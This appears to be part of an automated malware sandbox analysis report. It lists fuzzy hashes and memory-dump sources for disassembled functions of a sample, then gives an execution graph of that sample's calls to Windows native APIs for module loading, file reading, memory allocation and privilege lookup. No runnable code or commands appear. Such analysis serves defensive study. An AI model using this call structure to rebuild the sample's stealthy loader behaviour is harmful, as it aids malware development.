                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7773651359dc3358f3204d04835505b17c71b1c4c463c14b7f1b48e4adc0a0f6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C81D074A15209CFCB44CF99C6849EEFBF2FF88210F14855AE419AB320D734AA52CF90
                                                                                                                                                                                                                      Function 0548E1F9 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 017f9f9893329854e9ed82f873407c465ba247aaac9ddd7682e08add04e21644
                                                                                                                                                                                                                      • Instruction ID: 38087c49283b653ece00ab1cb074da597d97bf11dd375f795a7416ac48515a09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 017f9f9893329854e9ed82f873407c465ba247aaac9ddd7682e08add04e21644
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD71C374E15209DFCB44CFA9C5849AEFBF6FF88210F148556E419AB320D734AA52CF51
                                                                                                                                                                                                                      Function 0548EDC8 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6f94971f00bfef50190ad058d028d36a955f09ae886b80b8b3c21f72505cb00a
                                                                                                                                                                                                                      • Instruction ID: 4712ae6364d922a0cd5f8f7ef2443c4df7722ac38dca144bb9ab0f551c694792
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f94971f00bfef50190ad058d028d36a955f09ae886b80b8b3c21f72505cb00a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE61D374E0521ADFCB04DFA9C5819EEFBF6FB88200F248566D415A7314D730AE52CBA4
                                                                                                                                                                                                                      Function 0548EDD8 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: dfbdf5105cfe5f267377d2dc122eee5791aba7384fc24dee494091b3c234b94f
                                                                                                                                                                                                                      • Instruction ID: 6fe61bbd41b1fb160de3b6345ee600d2abfa5b665b05b878689f97a352fe5f44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfbdf5105cfe5f267377d2dc122eee5791aba7384fc24dee494091b3c234b94f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D610374E05219DFCB04DFA9C5819EEFBB6FB88200F24955AD409AB314D330AA52CFA4
                                                                                                                                                                                                                      Function 0548F868 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4c9c7dc56e57f66c9f5a3fb3a9e808211ed2da677032ef7f3bf736f0706fd39f
                                                                                                                                                                                                                      • Instruction ID: 6e6494c6af06a390a93feed9caef547c2a8eb01dba364f3dd7d8bd1c426a482c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9c7dc56e57f66c9f5a3fb3a9e808211ed2da677032ef7f3bf736f0706fd39f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D511B70E0520AEBCB44DFA6C5815EEFBF2EF88300F24D46AC415B7314E7349A858B95
                                                                                                                                                                                                                      Function 0548F878 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 13a637e55359c21a9d3672fb2baf00a49ab33ebdc2b1169a915d355bbdc1b8db
                                                                                                                                                                                                                      • Instruction ID: d686a0957c87740d5cf1e1e0fa7ebe3f44eec5d8200e1a3db3412e5372e2aad8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13a637e55359c21a9d3672fb2baf00a49ab33ebdc2b1169a915d355bbdc1b8db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97510A74E0520AEBCB44DFA6C5815EEFBF2BF88300F24D46AC415B7214E7349A868B95
                                                                                                                                                                                                                      Function 0548DFF8 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: aeff4f76af50a59ea273bd9fcd3cf61f729cba0a4ebad7126712ce2154ba0afb
                                                                                                                                                                                                                      • Instruction ID: 73360140bbf02c75dc97e061fbc516c9dee3c09d9a6846884b0e7c8fb8429ac9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aeff4f76af50a59ea273bd9fcd3cf61f729cba0a4ebad7126712ce2154ba0afb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA417C70E05209EBCB08EFAAC6815EEFBB6FF85204F14C5AAC015A7355E7349A528F54
                                                                                                                                                                                                                      Function 0548E008 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2eb7f08d48cfeae3e5544a39666301a9e44f6b126a5e3e816abd87641e08a1da
                                                                                                                                                                                                                      • Instruction ID: f594a4fe5775e3662901a55c8d6c92f7a944bf9ce9cbcaba8b8c5549c094a7c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eb7f08d48cfeae3e5544a39666301a9e44f6b126a5e3e816abd87641e08a1da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E415C70E05219EFCB08EFAAC6805FEFBB6FF85204F14D59AC015A7215E7349A528F54
                                                                                                                                                                                                                      Function 0548A220 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 95fa720e18920bc860cb4647f1a8867363376c193a065161006dd665aba7744b
                                                                                                                                                                                                                      • Instruction ID: 4d4f98168fd02346d6685aeccd9c51823df6d8182ca9b2132d3e248160ca9ba3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95fa720e18920bc860cb4647f1a8867363376c193a065161006dd665aba7744b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39310C71E116189BEB18CFABC8416EEFBF3BFC9210F14C16AC508A6324DB7059868F51
                                                                                                                                                                                                                      Function 0548A210 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f0f55e15a64f37260186d24a5885e533a613832e0af14036e1d50712f9f49243
                                                                                                                                                                                                                      • Instruction ID: aede157734ac6da919a8d5b0b03bc9a9aaba9bb6d904d554c26335844782a4ba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0f55e15a64f37260186d24a5885e533a613832e0af14036e1d50712f9f49243
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59312C71E116189BEB58CFABC8416DEFBF3AFC8210F18C56AC408A6314DB7059828F51

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:1.3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                                      Signature Coverage:6.2%
                                                                                                                                                                                                                      Total number of Nodes:549
                                                                                                                                                                                                                      Total number of Limit Nodes:66
                                                                                                                                                                                                                      execution_graph 99255 41f0e0 99256 41f0eb 99255->99256 99258 41b940 99255->99258 99259 41b966 99258->99259 99266 409d40 99259->99266 99261 41b972 99265 41b993 99261->99265 99274 40c1c0 99261->99274 99263 41b985 99310 41a680 99263->99310 99265->99256 99313 409c90 99266->99313 99268 409d4d 99269 409d54 99268->99269 99325 409c30 99268->99325 99269->99261 99275 40c1e5 99274->99275 99733 40b1c0 99275->99733 99277 40c23c 99737 40ae40 99277->99737 99279 40c262 99309 40c4b3 99279->99309 99746 4143a0 99279->99746 99281 40c2a7 99281->99309 99749 408a60 99281->99749 99283 40c2eb 99283->99309 99756 41a4d0 99283->99756 99287 40c341 99288 40c348 99287->99288 99768 419fe0 99287->99768 99289 41bd90 2 API calls 99288->99289 99291 40c355 99289->99291 99291->99263 99293 40c392 99294 41bd90 2 API calls 99293->99294 99295 40c399 99294->99295 99295->99263 99296 40c3a2 99297 40f4a0 3 API calls 99296->99297 99298 40c416 99297->99298 99298->99288 99299 40c421 99298->99299 99300 41bd90 2 API calls 99299->99300 99301 40c445 99300->99301 99773 41a030 99301->99773 99304 419fe0 2 API calls 99305 40c480 99304->99305 99305->99309 99778 419df0 99305->99778 99308 41a680 2 API calls 99308->99309 99309->99263 99311 41af30 LdrLoadDll 99310->99311 99312 41a69f ExitProcess 99311->99312 99312->99265 99314 409ca3 99313->99314 99364 418b90 LdrLoadDll 99313->99364 99344 418a40 99314->99344 99317 409cb6 99317->99268 99318 409cac 99318->99317 99347 41b280 99318->99347 99320 409cf3 99320->99317 99358 409ab0 99320->99358 99322 409d13 99365 409620 LdrLoadDll 99322->99365 99324 409d25 99324->99268 99326 409c4a 99325->99326 99327 41b570 LdrLoadDll 99325->99327 99708 41b570 99326->99708 99327->99326 99330 41b570 LdrLoadDll 99331 409c71 99330->99331 99332 40f180 99331->99332 99333 40f199 99332->99333 99716 40b040 99333->99716 99335 40f1ac 99336 40f1bb 99335->99336 99728 41a1b0 99335->99728 99338 409d65 99336->99338 99720 41a7a0 99336->99720 99338->99261 99340 40f1d2 99341 40f1fd 99340->99341 99723 41a230 99340->99723 99342 41a460 2 API calls 99341->99342 99342->99338 99366 41a5d0 99344->99366 99348 41b299 99347->99348 99379 414a50 99348->99379 99350 41b2b1 99351 41b2ba 99350->99351 99418 41b0c0 99350->99418 99351->99320 99353 41b2ce 99353->99351 99436 419ed0 99353->99436 99686 407ea0 99358->99686 99360 409ad1 99360->99322 99361 409aca 99361->99360 99699 408160 99361->99699 99364->99314 99365->99324 99369 41af30 99366->99369 99368 418a55 99368->99318 99370 41af40 99369->99370 99371 41af62 99369->99371 99373 414e50 99370->99373 99371->99368 99374 414e6a 99373->99374 99375 414e5e 99373->99375 99374->99371 99375->99374 99378 4152d0 LdrLoadDll 99375->99378 99377 414fbc 99377->99371 99378->99377 99380 414d85 99379->99380 99390 414a64 99379->99390 99380->99350 99383 414b7d 99383->99350 99384 414b90 99447 41a330 99384->99447 99385 414b73 99504 41a430 LdrLoadDll 99385->99504 99388 414bb7 99389 41bd90 2 API calls 99388->99389 99392 414bc3 99389->99392 99390->99380 99444 419c20 99390->99444 99391 414d49 99394 41a460 2 API calls 99391->99394 99392->99383 99392->99391 99393 414d5f 99392->99393 99398 414c52 99392->99398 99513 414790 LdrLoadDll NtReadFile NtClose 99393->99513 99395 414d50 99394->99395 99395->99350 99397 414d72 99397->99350 99399 414cb9 99398->99399 99401 414c61 99398->99401 99399->99391 99400 414ccc 99399->99400 99506 41a2b0 99400->99506 99402 414c66 99401->99402 99403 414c7a 99401->99403 99505 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99402->99505 99406 414c97 99403->99406 99407 414c7f 99403->99407 99406->99395 99462 414410 99406->99462 99450 4146f0 99407->99450 99410 414c70 99410->99350 99412 414d2c 99510 41a460 99412->99510 99413 414c8d 99413->99350 99416 414caf 99416->99350 99417 414d38 99417->99350 99419 41b0d1 99418->99419 99420 41b0e3 99419->99420 99531 41bd10 99419->99531 99420->99353 99422 41b104 99534 414070 99422->99534 99424 41b150 99424->99353 99425 41b127 99425->99424 99426 414070 3 API calls 99425->99426 99428 41b149 99426->99428 99428->99424 99559 415390 99428->99559 99429 41b1da 99430 41b1ea 99429->99430 99653 41aed0 LdrLoadDll 99429->99653 99569 41ad40 99430->99569 99433 41b218 99648 419e90 99433->99648 99437 419eec 99436->99437 99438 41af30 LdrLoadDll 99436->99438 99680 f82c0a 99437->99680 99438->99437 99439 419f07 99441 41bd90 99439->99441 99683 41a640 99441->99683 99443 41b329 99443->99320 99445 41af30 LdrLoadDll 99444->99445 99446 414b44 99445->99446 99446->99383 99446->99384 99446->99385 99448 41a34c NtCreateFile 99447->99448 99449 41af30 LdrLoadDll 99447->99449 99448->99388 99449->99448 99451 41470c 99450->99451 99452 41a2b0 LdrLoadDll 99451->99452 99453 41472d 99452->99453 99454 414734 99453->99454 99455 414748 99453->99455 99457 41a460 2 API calls 99454->99457 99456 41a460 2 API calls 99455->99456 99458 414751 99456->99458 99459 41473d 99457->99459 99514 41bfa0 LdrLoadDll RtlAllocateHeap 99458->99514 99459->99413 99461 41475c 99461->99413 99463 41445b 99462->99463 99464 41448e 99462->99464 99466 41a2b0 LdrLoadDll 99463->99466 99465 4145d9 99464->99465 99470 4144aa 99464->99470 99467 41a2b0 LdrLoadDll 99465->99467 99468 414476 99466->99468 99474 4145f4 99467->99474 99469 41a460 2 API calls 99468->99469 99471 41447f 99469->99471 99472 41a2b0 LdrLoadDll 99470->99472 99471->99416 99473 4144c5 99472->99473 99476 4144e1 99473->99476 99477 4144cc 99473->99477 99527 41a2f0 LdrLoadDll 99474->99527 99480 4144e6 99476->99480 99481 4144fc 99476->99481 99479 41a460 2 API calls 99477->99479 99478 41462e 99482 41a460 2 API calls 99478->99482 99483 4144d5 99479->99483 99484 41a460 2 API calls 99480->99484 99489 414501 99481->99489 99515 41bf60 99481->99515 99485 414639 99482->99485 99483->99416 99486 4144ef 99484->99486 99485->99416 99486->99416 99497 414513 99489->99497 99518 41a3e0 99489->99518 99490 414567 99491 41457e 99490->99491 99526 41a270 LdrLoadDll 99490->99526 99492 414585 99491->99492 99493 41459a 99491->99493 99495 41a460 2 API calls 99492->99495 99496 41a460 2 API calls 99493->99496 99495->99497 99498 4145a3 99496->99498 99497->99416 99499 4145cf 99498->99499 99521 41bb60 99498->99521 99499->99416 99501 4145ba 99502 41bd90 2 API calls 99501->99502 99503 4145c3 99502->99503 99503->99416 99504->99383 99505->99410 99507 41af30 LdrLoadDll 99506->99507 99508 414d14 99507->99508 99509 41a2f0 LdrLoadDll 99508->99509 99509->99412 99511 41a47c NtClose 99510->99511 99512 41af30 LdrLoadDll 99510->99512 99511->99417 99512->99511 99513->99397 99514->99461 99528 41a600 99515->99528 99517 41bf78 99517->99489 99519 41a3fc NtReadFile 99518->99519 99520 41af30 LdrLoadDll 99518->99520 99519->99490 99520->99519 99522 41bb84 99521->99522 99523 41bb6d 99521->99523 99522->99501 99523->99522 99524 41bf60 2 API calls 99523->99524 99525 41bb9b 99524->99525 99525->99501 99526->99491 99527->99478 99529 41af30 LdrLoadDll 99528->99529 99530 41a61c RtlAllocateHeap 99529->99530 99530->99517 99532 41bd3d 99531->99532 99654 41a510 99531->99654 99532->99422 99535 414081 99534->99535 99536 414089 99534->99536 99535->99425 99558 41435c 99536->99558 99657 41cf00 99536->99657 99538 4140dd 99539 41cf00 2 API calls 99538->99539 99542 4140e8 99539->99542 99540 414136 99543 41cf00 2 API calls 99540->99543 99542->99540 99662 41cfa0 99542->99662 99544 41414a 99543->99544 99545 41cf00 2 API calls 99544->99545 99547 4141bd 99545->99547 99546 41cf00 2 API calls 99555 414205 99546->99555 99547->99546 99549 414334 99669 41cf60 LdrLoadDll RtlFreeHeap 99549->99669 99551 41433e 99670 41cf60 LdrLoadDll RtlFreeHeap 99551->99670 99553 414348 99671 41cf60 LdrLoadDll RtlFreeHeap 99553->99671 99668 41cf60 LdrLoadDll RtlFreeHeap 99555->99668 99556 414352 99672 41cf60 LdrLoadDll RtlFreeHeap 99556->99672 99558->99425 99560 4153a1 99559->99560 99561 414a50 8 API calls 99560->99561 99563 4153b7 99561->99563 99562 41540a 99562->99429 99563->99562 99564 4153f2 99563->99564 99565 415405 99563->99565 99566 41bd90 2 API calls 99564->99566 99567 41bd90 2 API calls 99565->99567 99568 4153f7 99566->99568 99567->99562 99568->99429 99673 41ac00 99569->99673 99572 41ac00 LdrLoadDll 99573 41ad5d 99572->99573 99574 41ac00 LdrLoadDll 99573->99574 99575 41ad66 99574->99575 99576 41ac00 LdrLoadDll 99575->99576 99577 41ad6f 99576->99577 99578 41ac00 LdrLoadDll 99577->99578 99579 41ad78 99578->99579 99580 41ac00 LdrLoadDll 99579->99580 99581 41ad81 99580->99581 99582 41ac00 LdrLoadDll 99581->99582 99583 41ad8d 99582->99583 99584 41ac00 LdrLoadDll 99583->99584 99585 41ad96 99584->99585 99586 41ac00 LdrLoadDll 99585->99586 99587 41ad9f 99586->99587 99588 41ac00 LdrLoadDll 99587->99588 99589 41ada8 99588->99589 99590 41ac00 LdrLoadDll 99589->99590 99591 41adb1 99590->99591 99592 41ac00 LdrLoadDll 99591->99592 99593 41adba 99592->99593 99594 41ac00 LdrLoadDll 99593->99594 99595 41adc6 99594->99595 99596 41ac00 LdrLoadDll 99595->99596 99597 41adcf 99596->99597 99598 41ac00 LdrLoadDll 99597->99598 99599 41add8 99598->99599 99600 41ac00 LdrLoadDll 99599->99600 99601 41ade1 99600->99601 99602 41ac00 LdrLoadDll 99601->99602 99603 41adea 99602->99603 99604 41ac00 LdrLoadDll 99603->99604 99605 41adf3 99604->99605 99606 41ac00 LdrLoadDll 99605->99606 99607 41adff 99606->99607 99608 41ac00 LdrLoadDll 99607->99608 99609 41ae08 99608->99609 99610 41ac00 LdrLoadDll 99609->99610 99611 41ae11 99610->99611 99612 41ac00 LdrLoadDll 99611->99612 99613 41ae1a 99612->99613 99614 41ac00 LdrLoadDll 99613->99614 99615 41ae23 99614->99615 99616 41ac00 LdrLoadDll 99615->99616 99617 41ae2c 99616->99617 99618 41ac00 LdrLoadDll 99617->99618 99619 41ae38 99618->99619 99620 41ac00 LdrLoadDll 99619->99620 99621 41ae41 99620->99621 99622 41ac00 LdrLoadDll 99621->99622 99623 41ae4a 99622->99623 99624 41ac00 LdrLoadDll 99623->99624 99625 41ae53 99624->99625 99626 41ac00 LdrLoadDll 99625->99626 99627 41ae5c 99626->99627 99628 41ac00 LdrLoadDll 99627->99628 99629 41ae65 99628->99629 99630 41ac00 LdrLoadDll 99629->99630 99631 41ae71 99630->99631 99632 41ac00 LdrLoadDll 99631->99632 99633 41ae7a 99632->99633 99634 41ac00 LdrLoadDll 99633->99634 99635 41ae83 99634->99635 99636 41ac00 LdrLoadDll 99635->99636 99637 41ae8c 99636->99637 99638 41ac00 LdrLoadDll 99637->99638 99639 41ae95 99638->99639 99640 41ac00 LdrLoadDll 99639->99640 99641 41ae9e 99640->99641 99642 41ac00 LdrLoadDll 99641->99642 99643 41aeaa 99642->99643 99644 41ac00 LdrLoadDll 99643->99644 99645 41aeb3 99644->99645 99646 41ac00 LdrLoadDll 99645->99646 99647 41aebc 99646->99647 99647->99433 99649 41af30 LdrLoadDll 99648->99649 99650 419eac 99649->99650 99679 f82df0 LdrInitializeThunk 99650->99679 99651 419ec3 99651->99353 99653->99430 99655 41a52c NtAllocateVirtualMemory 99654->99655 99656 41af30 LdrLoadDll 99654->99656 99655->99532 99656->99655 99658 41cf10 99657->99658 99659 41cf16 99657->99659 99658->99538 99660 41bf60 2 API calls 99659->99660 99661 41cf3c 99660->99661 99661->99538 99663 41cfc5 99662->99663 99666 41cffd 99662->99666 99664 41bf60 2 API calls 99663->99664 99665 41cfda 99664->99665 99667 41bd90 2 API calls 99665->99667 99666->99542 99667->99666 99668->99549 99669->99551 99670->99553 99671->99556 99672->99558 99674 41ac1b 99673->99674 99675 414e50 LdrLoadDll 99674->99675 99676 41ac3b 99675->99676 99677 414e50 LdrLoadDll 99676->99677 99678 41ace7 99676->99678 99677->99678 99678->99572 99679->99651 99681 f82c1f LdrInitializeThunk 99680->99681 99682 f82c11 99680->99682 99681->99439 99682->99439 99684 41af30 LdrLoadDll 99683->99684 99685 41a65c RtlFreeHeap 99684->99685 99685->99443 99687 407eb0 99686->99687 99688 407eab 99686->99688 99689 41bd10 2 API calls 99687->99689 99688->99361 99692 407ed5 99689->99692 99690 407f38 99690->99361 99691 419e90 2 API calls 99691->99692 99692->99690 99692->99691 99694 407f3e 99692->99694 99698 41bd10 2 API calls 99692->99698 99702 41a590 99692->99702 99695 407f64 99694->99695 99696 41a590 2 API calls 99694->99696 99695->99361 99697 407f55 99696->99697 99697->99361 99698->99692 99700 40817e 99699->99700 99701 41a590 2 API calls 99699->99701 99700->99322 99701->99700 99703 41af30 LdrLoadDll 99702->99703 99704 41a5ac 99703->99704 99704->99692 99705 41a5cc 99704->99705 99707 f82c70 LdrInitializeThunk 99704->99707 99707->99704 99709 41b593 99708->99709 99712 40acf0 99709->99712 99713 40ad14 99712->99713 99714 409c5b 99713->99714 99715 40ad5d LdrLoadDll 99713->99715 99714->99330 99715->99714 99717 40b063 99716->99717 99718 40b0e0 99717->99718 99731 419c60 LdrLoadDll 99717->99731 99718->99335 99721 41af30 LdrLoadDll 99720->99721 99722 41a7bf LookupPrivilegeValueW 99721->99722 99722->99340 99724 41af30 LdrLoadDll 99723->99724 99725 41a24c 99724->99725 99732 f82ea0 LdrInitializeThunk 99725->99732 99726 41a26b 99726->99341 99729 41af30 LdrLoadDll 99728->99729 99730 41a1cc 99729->99730 99730->99336 99731->99718 99732->99726 99734 40b1f0 99733->99734 99735 40b040 LdrLoadDll 99734->99735 99736 40b204 99735->99736 99736->99277 99738 40ae51 99737->99738 99739 40ae4d 99737->99739 99740 40ae6a 99738->99740 99741 40ae9c 99738->99741 99739->99279 99783 419ca0 LdrLoadDll 99740->99783 99784 419ca0 LdrLoadDll 99741->99784 99743 40aead 99743->99279 99745 40ae8c 99745->99279 99747 40f4a0 3 API calls 99746->99747 99748 4143c6 99746->99748 99747->99748 99748->99281 99750 408a79 99749->99750 99785 4087a0 99749->99785 99752 4087a0 19 API calls 99750->99752 99755 408a9d 99750->99755 99753 408a8a 99752->99753 99753->99755 99803 40f710 10 API calls 99753->99803 99755->99283 99757 41af30 LdrLoadDll 99756->99757 99758 41a4ec 99757->99758 99922 f82e80 LdrInitializeThunk 99758->99922 99759 40c322 99761 40f4a0 99759->99761 99762 40f4bd 99761->99762 99923 419f90 99762->99923 99765 40f505 99765->99287 99766 419fe0 2 API calls 99767 40f52e 99766->99767 99767->99287 99769 419ffc 99768->99769 99770 41af30 LdrLoadDll 99768->99770 99930 f82d10 LdrInitializeThunk 99769->99930 99770->99769 99771 40c385 99771->99293 99771->99296 99774 41af30 LdrLoadDll 99773->99774 99775 41a04c 99774->99775 99931 f82d30 LdrInitializeThunk 99775->99931 99776 40c459 99776->99304 99779 41af30 LdrLoadDll 99778->99779 99780 419e0c 99779->99780 99932 f82fb0 LdrInitializeThunk 99780->99932 99781 40c4ac 99781->99308 99783->99745 99784->99743 99786 407ea0 4 API calls 99785->99786 99800 4087ba 99785->99800 99786->99800 99787 408a49 99787->99750 99788 408a3f 99789 408160 2 API calls 99788->99789 99789->99787 99792 419ed0 2 API calls 99792->99800 99796 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99796->99800 99799 419df0 2 API calls 99799->99800 99800->99787 99800->99788 99800->99792 99800->99796 99800->99799 99801 41a460 LdrLoadDll NtClose 99800->99801 99804 419ce0 99800->99804 99807 4085d0 99800->99807 99819 40f5f0 LdrLoadDll NtClose 99800->99819 99820 419d60 LdrLoadDll 99800->99820 99821 419d90 LdrLoadDll 99800->99821 99822 419e20 LdrLoadDll 99800->99822 99823 4083a0 99800->99823 99839 405f60 LdrLoadDll 99800->99839 99801->99800 99803->99755 99805 41af30 LdrLoadDll 99804->99805 99806 419cfc 99805->99806 99806->99800 99808 4085e6 99807->99808 99840 419850 99808->99840 99810 4085ff 99815 408771 99810->99815 99861 4081a0 99810->99861 99812 4086e5 99813 4083a0 11 API calls 99812->99813 99812->99815 99814 408713 99813->99814 99814->99815 99816 419ed0 2 API calls 99814->99816 99815->99800 99817 408748 99816->99817 99817->99815 99818 41a4d0 2 API calls 99817->99818 99818->99815 99819->99800 99820->99800 99821->99800 99822->99800 99824 4083c9 99823->99824 99901 408310 99824->99901 99827 41a4d0 2 API calls 99828 4083dc 99827->99828 99828->99827 99829 408467 99828->99829 99831 408462 99828->99831 99909 40f670 99828->99909 99829->99800 99830 41a460 2 API calls 99832 40849a 99830->99832 99831->99830 99832->99829 99833 419ce0 LdrLoadDll 99832->99833 99834 4084ff 99833->99834 99834->99829 99913 419d20 99834->99913 99836 408563 99836->99829 99837 414a50 8 API calls 99836->99837 99838 4085b8 99837->99838 99838->99800 99839->99800 99841 41bf60 2 API calls 99840->99841 99842 419867 99841->99842 99868 409310 99842->99868 99844 419882 99845 4198c0 99844->99845 99846 4198a9 99844->99846 99849 41bd10 2 API calls 99845->99849 99847 41bd90 2 API calls 99846->99847 99848 4198b6 99847->99848 99848->99810 99850 4198fa 99849->99850 99851 41bd10 2 API calls 99850->99851 99852 419913 99851->99852 99858 419bb4 99852->99858 99874 41bd50 99852->99874 99855 419ba0 99856 41bd90 2 API calls 99855->99856 99857 419baa 99856->99857 99857->99810 99859 41bd90 2 API calls 99858->99859 99860 419c09 99859->99860 99860->99810 99862 40829f 99861->99862 99863 4081b5 99861->99863 99862->99812 99863->99862 99864 414a50 8 API calls 99863->99864 99865 408222 99864->99865 99866 41bd90 2 API calls 99865->99866 99867 408249 99865->99867 99866->99867 99867->99812 99869 409335 99868->99869 99870 40acf0 LdrLoadDll 99869->99870 99871 409368 99870->99871 99873 40938d 99871->99873 99877 40cf20 99871->99877 99873->99844 99895 41a550 99874->99895 99878 40cf4c 99877->99878 99879 41a1b0 LdrLoadDll 99878->99879 99880 40cf65 99879->99880 99881 40cf6c 99880->99881 99888 41a1f0 99880->99888 99881->99873 99885 40cfa7 99886 41a460 2 API calls 99885->99886 99887 40cfca 99886->99887 99887->99873 99889 41a20c 99888->99889 99890 41af30 LdrLoadDll 99888->99890 99894 